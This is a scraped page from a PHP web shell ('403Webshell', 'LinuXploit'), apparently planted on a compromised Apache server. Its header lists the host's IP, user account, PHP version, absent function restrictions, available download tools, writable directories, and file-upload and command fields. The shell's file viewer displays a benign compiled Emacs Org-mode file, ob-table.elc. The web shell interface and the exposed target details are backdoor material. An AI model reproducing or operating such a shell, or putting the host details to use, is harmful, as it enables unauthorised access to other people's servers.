403Webshell
Server IP : 217.160.0.212  /  Your IP : 216.73.216.15
Web Server : Apache
System : Linux www 6.18.52-i1-ampere #1203 SMP Mon Sep 14 18:29:59 CEST 2026 aarch64
User : sws1073854427 ( 1073854427)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/emacs/28.2/lisp/org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/emacs/28.2/lisp/org/ob-table.elc
;ELC
;;; Compiled
;;; in Emacs version 28.2
;;; with all optimizations.



(byte-code "\300\301!\210\300\302!\207" [require ob-core org-macs] 2)
#@158 Replace newline character with ellipses.
If STRING ends in a newline character, then remove the newline
character and replace it with ellipses.

(fn STRING)
(defalias 'org-babel-table-truncate-at-newline #[257 "\211;\203\300\301\"\203\211\302\211\224O\303\304\"\205\305P\207\207" [string-match "[\n
]\\(.\\)?" 0 match-string 1 "..."] 5 (#$ . 155)])
#@1131 Return the results of calling SOURCE-BLOCK with VARIABLES.

Each element of VARIABLES should be a list of two elements: the
first element is the name of the variable and second element is a
string of its value.

So this `org-sbe' construct

 (org-sbe "source-block" (n $2) (m 3))

is the equivalent of the following source code block:

 #+begin_src emacs-lisp :var results=source-block(n=val_at_col_2, m=3) \
     :results silent
 results
 #+end_src

NOTE: The quotation marks around the function name,
`source-block', are optional.

NOTE: By default, string variable names are interpreted as
references to source-code blocks, to force interpretation of a
cell's value as a string, prefix the identifier a "$" (e.g.,
"$$2" instead of "$2" or "$@2$2" instead of "@2$2").

NOTE: It is also possible to pass header arguments to the code
block.  In this case a table cell should hold the string value of
the header argument which can then be passed before all variables
as shown in the example below.

| 1 | 2 | :file nothing.png | nothing.png |
#+TBLFM: @1$4=\='(org-sbe test-sbe $3 (x $1) (y $2))

(fn SOURCE-BLOCK &rest VARIABLES)
(defalias 'org-sbe '(macro . #[385 "\211@;\203\211@\202\f\300@;\203A\202\301C\302\303\304\"\";\204,\305!\262\203dG\306V\203d\307\310\311\312	\313	\314\315\316\317\320\fD\321BBB\322BBBBBBBBD!\323\301\324\325E\326#\262\202e\300\211;\203n\211\202r\327\330\"\301\331\203|\332\202}\333\300\331\334\300##\207" ["" nil mapcar make-closure #[257 "\211@\301\302\303\304\305\300\"A\"\"B\207" [V0 delq nil mapcar make-closure #[257 "\211\302=\203\f\300\303\240\210\304\207\300\242\203\305\306\"\202=\211;\203<\211\304\211\203.\307\310G	$\210\2026\311\310G\304$\210\266\202\202=\211\300\304\240\210\207" [V0 org-rm-props $ t nil format "\"%s\"" remove-text-properties 0 set-text-properties] 8 "\n\n(fn EL)"]] 8 "\n\n(fn VAR)"] symbol-name 0 eval org-babel-parse-header-arguments concat ":var results=" "[" "]" "(" mapconcat (lambda (var-spec) (if (> (length (cdr var-spec)) 1) (format "%S='%S" (car var-spec) (mapcar #'read (cdr var-spec))) (format "%S=%s" (car var-spec) (cadr var-spec)))) quote (", ") (")") org-babel-execute-src-block "emacs-lisp" "results" ((:results . "silent")) format "%S" replace-regexp-in-string "\\`\\([ 	]*\n\\)+" "\\`[ 	\n
]+" "[ 	\n
]+\\'"] 19 (#$ . 520)]))
(byte-code "\300\301\302\303#\210\304\305!\207" [put org-sbe edebug-form-spec (form form) provide ob-table] 4)

Youez - 2016 - github.com/yon3zu
LinuXploit